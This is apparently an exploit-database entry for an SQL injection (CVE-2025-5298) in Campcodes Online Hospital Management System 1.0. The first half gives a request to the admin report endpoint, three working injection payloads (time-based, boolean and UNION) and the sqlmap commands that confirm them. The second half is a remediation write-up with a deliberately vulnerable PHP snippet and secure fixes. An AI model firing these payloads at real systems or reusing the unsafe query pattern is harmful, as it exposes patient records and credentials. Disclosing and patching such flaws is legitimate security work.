Campcodes Online Hospital Management System 1.0 - SQL Injection

Exploit Author: Carine Constantino Analysis Author: www.bubbleslearn.ir Category: WebApps Language: SQL Published Date: 2025-05-29

# Exploit Title: Campcodes Online Hospital Management System 1.0 - SQL Injection
# Google Dork: N/A
# Exploit Author: Carine Constantino
# Vendor Homepage: https://www.campcodes.com
# Software Link: https://www.campcodes.com/projects/online-hospital-management-system-using-php-and-mysql/
# Version: 1.0
# Tested on: Linux - Ubuntu Ubuntu 23.10 
# CVE: CVE-2025-5298

# Campcodes Online Hospital Management System 1.0 is vulnerable to SQL Injection
# The report in admin/betweendates-detailsreports.php does not validate ‘fromdate’ and ‘todate’ fields
#  And allows the processing of SQL Injection queries of the types: 

# blind time-based in the ‘fromdate’ field 
# boolean-based in the ‘todate’ field
# Union Query in the ‘todate’ field

‘fromdate’ field is vulnerable to SQL Injection on reports accessed on “/admin/betweendates-detailsreports.php” from POST request

POST /HospitalManagementSystem/hospital/hms/admin/betweendates-detailsreports.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:139.0) Gecko/20100101 Firefox/139.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 45
Origin: http://127.0.0.1
Connection: keep-alive
Referer: http://127.0.0.1/HospitalManagementSystem/hospital/hms/admin/between-dates-reports.php
Cookie: ajs_anonymous_id=e18be7d3-2b50-4bed-9962-5cfab989426f; PHPSESSID=hfb8j1phivvf11o2j9cd492oqe
Upgrade-Insecure-Requests: 1
Priority: u=0, i

fromdate=&todate=&submit=

=======================================|| Blind Time Based - ‘fromdate’ field ||==============================================

SQLMap identified the following injection payload: 

Parameter: fromdate (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: fromdate=2019-01-01' AND (SELECT 5962 FROM (SELECT(SLEEP(5)))danz) AND 'awPP'='awPP&todate=2025-05-28&submit=

SQLMap first command to confirm the vulnerability: “sqlmap -r request.txt -p fromdate --dbs --random-agent --technique=T”


=======================================|| Boolean Based - ‘todate’ field ||==============================================

‘todate’ field is vulnerable to SQL Injection on reports accessed on “/admin/betweendates-detailsreports.php” from POST request
SQLMap identified the following injection payload: 

Parameter: todate (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: fromdate=2019-01-01&todate=2025-05-28' AND 3290=3290 AND 'yOfc'='yOfc&submit=

SQLMap first command to confirm the vulnerability: “sqlmap -r request.txt -p todate --dbs --random-agent --technique=B”

=======================================|| Union Query - ‘todate’ field ||==============================================

Another technique on ‘todate’ field can be exploited
SQLMap identified the following injection payload: 

Parameter: todate (POST)
    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: fromdate=2019-01-01&todate=2025-05-28' UNION ALL SELECT CONCAT(CONCAT('qkpxq','eLwmjRlXmPYByrACqjbUDqzOqYmBeKwQSUSMNXdM'),'qzzbq'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ckvh&submit=
    
    
SQLMap first command to confirm the vulnerability: “sqlmap -r request.txt -p todate --dbs --random-agent --technique=U”

Campcodes Online Hospital Management System 1.0 — SQL Injection (CVE-2025-5298)

This article describes the SQL Injection vulnerability discovered in Campcodes Online Hospital Management System (OHMS) 1.0 (CVE-2025-5298), explains the root cause and exploitation techniques at a conceptual level, and provides practical, secure remediation and testing guidance for developers, administrators, and security teams.

Summary and impact

Campcodes OHMS 1.0 contains SQL injection weaknesses in the administrative report endpoint betweendates-detailsreports.php. Two POST parameters — fromdate and todate — were found to be used unsafely in SQL statements, allowing attackers to influence query logic. Depending on how an attacker crafts input, this can lead to:

Time-based blind SQL injection (response delays used to infer data)
Boolean-based blind SQL injection (true/false responses to extract bits of data)
Union-based SQL injection (ability to return arbitrary rows/columns)

Potential impacts range from unauthorized data disclosure (patient records, credentials) to full database compromise depending on database privileges. Because this component is part of an administrative feature, exploitation risk is elevated if admin accounts are accessible externally.

Vulnerability mechanics (high level)

At a high level, the application concatenates or interpolates user-supplied date fields into SQL queries without proper parameterization or sufficient validation. When user input is placed directly into the WHERE clause (or other parts of a SQL statement), an attacker can submit crafted payloads that change the semantics of the SQL statement.

Common techniques that rely on this behavior include:

Boolean-based blind: Submit inputs that make a SQL conditional evaluate to true or false and observe differences in the page output or response codes.
Time-based blind: Embed database timing functions (for example, SLEEP in MySQL) to cause measurable delays when a condition is true — useful where responses do not reveal content.
Union-based: Use UNION SELECT to append attacker-controlled rows to query results, which may expose table contents if column counts and types match.

Responsible testing and legal considerations

Perform testing only on systems you own or on which you have explicit authorization. Unauthorised testing (even for research) may be illegal and harmful to patients and services in a healthcare environment.

Use a separate lab environment with representative data or anonymized datasets.
Document test scope and obtain written authorization for any penetration testing.
When verifying fixes, include regression tests and automated checks as part of CI/CD.

Example: vulnerable pattern (conceptual)

// Conceptual vulnerable PHP snippet — avoid this pattern:
$fromdate = $_POST['fromdate'];
$todate   = $_POST['todate'];

$sql = "SELECT * FROM tblreport WHERE date BETWEEN '$fromdate' AND '$todate'";
$result = mysqli_query($conn, $sql);

Explanation: This snippet concatenates raw POST data into SQL. If an attacker submits crafted values, they can break out of the quoted context and inject arbitrary SQL. The example intentionally shows the unsafe pattern so you can understand the root cause: untrusted input is used directly in a query string.

Secure remediation: parameterized queries and strict validation

The primary remediation steps are:

Use parameterized queries (prepared statements) for all database access.
Enforce strict input validation and canonicalization (e.g., validate that dates match an expected ISO format).
Minimize database privileges and use least privilege for the application DB user.
Limit error detail returned to clients and log full errors server-side.
Add monitoring / WAF protections to detect and block suspicious patterns.

Secure PHP example using PDO (recommended)

// Secure PHP PDO example: parameterized date range query
$fromdate = $_POST['fromdate'] ?? '';
$todate   = $_POST['todate'] ?? '';

// 1) Validate format (YYYY-MM-DD) strictly
if (!preg_match('/^\d{4}-\d{2}-\d{2}$/', $fromdate) || !preg_match('/^\d{4}-\d{2}-\d{2}$/', $todate)) {
    http_response_code(400);
    echo "Invalid date format";
    exit;
}

// 2) Use prepared statements with bound parameters
$stmt = $pdo->prepare('SELECT id, report_date, details FROM tblreport WHERE report_date BETWEEN :from AND :to');
$stmt->bindValue(':from', $fromdate);
$stmt->bindValue(':to', $todate);
$stmt->execute();
$rows = $stmt->fetchAll(PDO::FETCH_ASSOC);

Explanation: This code performs three important actions: (1) input validation using a strict regex that allows only the expected date format, (2) prepared statements (PDO::prepare + bound values) which ensure the database treats user input as data, not SQL, and (3) controlled error handling by returning a generic client error while keeping details in server logs.

Alternative defensive layers

Stored procedures: When used properly with parameter binding, they can centralize access logic. However, they are not a substitute for validation.
ORMs: Use a mature ORM (Doctrine, Eloquent) and avoid executing raw SQL when not necessary.
Least privilege: Ensure the DB account used by the web app cannot perform dangerous administrative operations (DROP, ALTER, file access, etc.).
WAF and rate-limiting: Use a WAF to block common SQLi patterns and limit abusive requests to sensitive admin endpoints.
Input whitelist: Prefer whitelisting acceptable input values (e.g., parse date using a date library and reject invalid dates).

Testing and verification (safe approach)

To verify remediation without exposing production systems:

Deploy a patched copy in a sandbox environment with representative but non-sensitive data.
Develop unit tests that simulate accepted and rejected inputs, asserting no SQL control characters alter behavior.
Include automated integration tests in CI to ensure prepared statements remain in place after code changes.
Use authenticated, permitted security scans and penetration tests performed by qualified professionals under an engagement agreement.

Hardening guidance for administrators

Administrators should also take operational measures:

Apply vendor patches and updates promptly. Monitor vendor homepage and vulnerability advisories for fixes.
Restrict administrative interfaces (VPN, IP allowlists, two-factor authentication).
Harden logging and monitoring to detect anomalous query patterns and unusual response delays (which may indicate time-based attacks).
Back up databases and have an incident response plan tailored to healthcare data confidentiality requirements.

Example of improved defensive query in MySQL with stored procedure (conceptual)

-- Conceptual stored procedure using parameters (server-side)
DELIMITER $$
CREATE PROCEDURE get_reports_by_dates(IN in_from DATE, IN in_to DATE)
BEGIN
    SELECT id, report_date, details FROM tblreport
    WHERE report_date BETWEEN in_from AND in_to;
END$$
DELIMITER ;

Explanation: This stored procedure accepts typed DATE parameters. When called from an application using parameterized calls, it reduces the chance of injection via formatted inputs. Still, the application should validate and bind parameters before invoking the procedure.

Detection & monitoring recommendations

Enable database query logging (with care for PII) and alert on anomalous patterns like repeated boolean queries or long-running SLEEP-like statements.
Monitor web application logs for suspicious input patterns at admin endpoints.
Use security scanning tools in development to detect insecure string concatenation and missing parameterization.

Conclusion and next steps

CVE-2025-5298 highlights a classic yet still-common issue: insufficient input handling and unparameterized SQL used in a healthcare administrative interface. The recommended remediation is to adopt parameterized queries, strict input validation, least privilege, and robust testing and monitoring. For project owners:

Prioritize patching OHMS installs and audit code paths that build SQL with user input.
Perform an authorized security assessment of related modules (reporting, admin tooling, login flows).
Integrate secure coding patterns and automated checks into development workflows to prevent regressions.

Reference	Notes
Vendor	https://www.campcodes.com — check for official patches and advisories
CVE	CVE-2025-5298 — published advisory and mitigation status